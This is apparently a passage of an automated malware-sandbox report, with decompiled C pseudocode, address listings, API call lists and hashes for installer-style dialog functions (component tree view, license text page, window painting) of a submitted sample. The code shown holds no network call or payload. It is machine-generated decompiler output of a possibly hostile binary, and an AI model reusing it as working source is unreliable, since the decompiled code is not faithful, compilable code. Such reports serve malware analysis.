					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                            0x00404f0d
                                                                            0x00404f26
                                                                            0x00404f2b
                                                                            0x00404f33
                                                                            0x00404f39
                                                                            0x00404f4f
                                                                            0x00404f52
                                                                            0x0040517d
                                                                            0x00405184
                                                                            0x00405198
                                                                            0x00405186
                                                                            0x00405188
                                                                            0x0040518b
                                                                            0x0040518c
                                                                            0x00405193
                                                                            0x00405193
                                                                            0x004051a4
                                                                            0x004051b2
                                                                            0x004051b5
                                                                            0x004051cb
                                                                            0x00405240
                                                                            0x00405243
                                                                            0x00405245
                                                                            0x0040524f
                                                                            0x0040525d
                                                                            0x0040525d
                                                                            0x0040525f
                                                                            0x00405269
                                                                            0x0040526f
                                                                            0x00405272
                                                                            0x00405275
                                                                            0x00405290
                                                                            0x00405277
                                                                            0x00405281
                                                                            0x00405281
                                                                            0x00405275
                                                                            0x00405269
                                                                            0x00000000
                                                                            0x00405243
                                                                            0x004051d0
                                                                            0x004051db
                                                                            0x004051e0
                                                                            0x004051e7
                                                                            0x004051ec
                                                                            0x004051f0
                                                                            0x004051fb
                                                                            0x004051fb
                                                                            0x004051ff
                                                                            0x00405203
                                                                            0x00405207
                                                                            0x0040521a
                                                                            0x00405209
                                                                            0x00405209
                                                                            0x00405210
                                                                            0x00405216
                                                                            0x00405212
                                                                            0x00405212
                                                                            0x00405212
                                                                            0x00405210
                                                                            0x0040521e
                                                                            0x00405220
                                                                            0x00405233
                                                                            0x00405236
                                                                            0x00405239
                                                                            0x00405239
                                                                            0x00405203
                                                                            0x00000000
                                                                            0x004051f0
                                                                            0x004051d2
                                                                            0x004051d9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405293
                                                                            0x00405293
                                                                            0x0040529a
                                                                            0x0040530b
                                                                            0x00405313
                                                                            0x0040531b
                                                                            0x0040531b
                                                                            0x00405324
                                                                            0x00405326
                                                                            0x0040532d
                                                                            0x00405330
                                                                            0x00405330
                                                                            0x00405336
                                                                            0x0040533d
                                                                            0x00405340
                                                                            0x00405340
                                                                            0x00405346
                                                                            0x0040534c
                                                                            0x00405352
                                                                            0x00405352
                                                                            0x0040535f
                                                                            0x004054c0
                                                                            0x004054c7
                                                                            0x004054e4
                                                                            0x004054ea
                                                                            0x004054fc
                                                                            0x004054fc
                                                                            0x00000000
                                                                            0x00405365
                                                                            0x00405367
                                                                            0x0040536c
                                                                            0x00405371
                                                                            0x00405376
                                                                            0x00405378
                                                                            0x00405378
                                                                            0x00405379
                                                                            0x0040537a
                                                                            0x0040537c
                                                                            0x0040537c
                                                                            0x00405384
                                                                            0x004053c5
                                                                            0x004053c7
                                                                            0x004053d7
                                                                            0x004053da
                                                                            0x004053df
                                                                            0x004053e6
                                                                            0x004053e9
                                                                            0x0040548b
                                                                            0x00405494
                                                                            0x0040549c
                                                                            0x0040549c
                                                                            0x004054aa
                                                                            0x004054bb
                                                                            0x004054bb
                                                                            0x00000000
                                                                            0x004054aa
                                                                            0x004053ef
                                                                            0x004053f2
                                                                            0x004053f8
                                                                            0x004053fd
                                                                            0x004053ff
                                                                            0x00405401
                                                                            0x00405407
                                                                            0x0040540e
                                                                            0x00405413
                                                                            0x0040541a
                                                                            0x0040541d
                                                                            0x0040541d
                                                                            0x00405424
                                                                            0x00405430
                                                                            0x00405434
                                                                            0x00405436
                                                                            0x00405436
                                                                            0x00405426
                                                                            0x00405428
                                                                            0x00405428
                                                                            0x00405456
                                                                            0x00405462
                                                                            0x00405471
                                                                            0x00405471
                                                                            0x00405473
                                                                            0x00405476
                                                                            0x0040547f
                                                                            0x00000000
                                                                            0x00405386
                                                                            0x00405391
                                                                            0x00405394
                                                                            0x00405399
                                                                            0x0040539b
                                                                            0x0040539f
                                                                            0x004053af
                                                                            0x004053b9
                                                                            0x004053bb
                                                                            0x004053be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004053a1
                                                                            0x004053a1
                                                                            0x004053a7
                                                                            0x004053a9
                                                                            0x004053a9
                                                                            0x004053aa
                                                                            0x004053ab
                                                                            0x00000000
                                                                            0x004053a1
                                                                            0x00405384
                                                                            0x0040535f
                                                                            0x004052a2
                                                                            0x00000000
                                                                            0x004052b8
                                                                            0x004052c2
                                                                            0x004052c7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004052d9
                                                                            0x004052de
                                                                            0x004052ea
                                                                            0x004052ea
                                                                            0x004052ec
                                                                            0x004052fb
                                                                            0x004052fd
                                                                            0x00405301
                                                                            0x00405304
                                                                            0x00000000
                                                                            0x00405304
                                                                            0x004052a2
                                                                            0x00404f58
                                                                            0x00404f5d
                                                                            0x00404f66
                                                                            0x00404f6d
                                                                            0x00404f7f
                                                                            0x00404f8a
                                                                            0x00404f90
                                                                            0x00404f9e
                                                                            0x00404fb2
                                                                            0x00404fb7
                                                                            0x00404fc4
                                                                            0x00404fc9
                                                                            0x00404fdf
                                                                            0x00404ff0
                                                                            0x00404ffd
                                                                            0x00404ffd
                                                                            0x00405000
                                                                            0x00405006
                                                                            0x00405008
                                                                            0x0040500b
                                                                            0x00405010
                                                                            0x00405015
                                                                            0x00405017
                                                                            0x00405017
                                                                            0x00405037
                                                                            0x00405037
                                                                            0x00405039
                                                                            0x0040503a
                                                                            0x0040503f
                                                                            0x00405045
                                                                            0x00405049
                                                                            0x0040504e
                                                                            0x00405056
                                                                            0x0040505a
                                                                            0x0040505f
                                                                            0x00405064
                                                                            0x0040506c
                                                                            0x0040506f
                                                                            0x0040513f
                                                                            0x00405152
                                                                            0x00000000
                                                                            0x00405075
                                                                            0x00405078
                                                                            0x0040507b
                                                                            0x0040507e
                                                                            0x0040507e
                                                                            0x00405084
                                                                            0x0040508d
                                                                            0x00405090
                                                                            0x00405094
                                                                            0x00405097
                                                                            0x0040509a
                                                                            0x004050a3
                                                                            0x004050ac
                                                                            0x004050af
                                                                            0x004050b2
                                                                            0x004050b5
                                                                            0x004050f3
                                                                            0x0040511e
                                                                            0x004050f5
                                                                            0x00405104
                                                                            0x00405104
                                                                            0x004050b7
                                                                            0x004050ba
                                                                            0x004050c8
                                                                            0x004050d2
                                                                            0x004050da
                                                                            0x004050e1
                                                                            0x004050ec
                                                                            0x004050ec
                                                                            0x004050b5
                                                                            0x00405124
                                                                            0x00405125
                                                                            0x00405131
                                                                            0x00405131
                                                                            0x0040513d
                                                                            0x00405158
                                                                            0x0040515b
                                                                            0x00405178
                                                                            0x00000000
                                                                            0x0040515d
                                                                            0x00405162
                                                                            0x0040516b
                                                                            0x004054fe
                                                                            0x00405510
                                                                            0x00405510
                                                                            0x0040515b
                                                                            0x00000000
                                                                            0x0040513d
                                                                            0x0040506f

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                            • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                            • DeleteObject.GDI32(00000000), ref: 00405000
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                            • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                            • GlobalFree.KERNEL32(?), ref: 00405340
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                            • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                            • ShowWindow.USER32(00000000), ref: 004054FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                            • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 91%
                                                                            			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x72cc24
						_t29 = _t69 + 0x14; // 0x72cc38
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433edc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}



















                                                                            0x0040466a
                                                                            0x00404797
                                                                            0x004047f4
                                                                            0x004047f8
                                                                            0x004048c5
                                                                            0x004048c7
                                                                            0x004048c7
                                                                            0x004048cd
                                                                            0x004048cd
                                                                            0x004048d0
                                                                            0x00000000
                                                                            0x004048d7
                                                                            0x00404806
                                                                            0x0040480c
                                                                            0x00404816
                                                                            0x00404821
                                                                            0x00404824
                                                                            0x00404827
                                                                            0x00404832
                                                                            0x00404835
                                                                            0x0040483c
                                                                            0x00404849
                                                                            0x0040485a
                                                                            0x00404860
                                                                            0x00404868
                                                                            0x00404876
                                                                            0x0040487c
                                                                            0x0040487c
                                                                            0x0040483c
                                                                            0x00404886
                                                                            0x00000000
                                                                            0x00404891
                                                                            0x00404895
                                                                            0x004048a5
                                                                            0x004048a5
                                                                            0x004048ab
                                                                            0x004048b7
                                                                            0x004048b7
                                                                            0x00000000
                                                                            0x004048bb
                                                                            0x00404886
                                                                            0x004047a2
                                                                            0x00000000
                                                                            0x004047b4
                                                                            0x004047b4
                                                                            0x004047b9
                                                                            0x004047b9
                                                                            0x004047bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004047e8
                                                                            0x004047ea
                                                                            0x004047ef
                                                                            0x00000000
                                                                            0x004047ef
                                                                            0x004047a2
                                                                            0x00404670
                                                                            0x00404673
                                                                            0x00404678
                                                                            0x00404689
                                                                            0x00404689
                                                                            0x00404691
                                                                            0x00404694
                                                                            0x00404698
                                                                            0x0040469b
                                                                            0x0040469f
                                                                            0x004046a2
                                                                            0x004046a5
                                                                            0x004046a8
                                                                            0x004046af
                                                                            0x004046b1
                                                                            0x004046b1
                                                                            0x004046bb
                                                                            0x004046c8
                                                                            0x004046d2
                                                                            0x004046d7
                                                                            0x004046da
                                                                            0x004046df
                                                                            0x004046f6
                                                                            0x004046fd
                                                                            0x00404710
                                                                            0x00404713
                                                                            0x00404727
                                                                            0x0040472e
                                                                            0x00404733
                                                                            0x00404738
                                                                            0x00404738
                                                                            0x00404746
                                                                            0x00404754
                                                                            0x00404766
                                                                            0x0040476b
                                                                            0x0040477b
                                                                            0x0040477d
                                                                            0x00000000

                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                            • GetSysColor.USER32(?), ref: 00404738
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                            • lstrlenW.KERNEL32(?), ref: 00404759
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                            • SendMessageW.USER32(00000000), ref: 004047DB
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                            • SetCursor.USER32(00000000), ref: 0040485A
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                            • SetCursor.USER32(00000000), ref: 00404876
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: Call$N
                                                                            • API String ID: 3103080414-3438112850
                                                                            • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                            • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
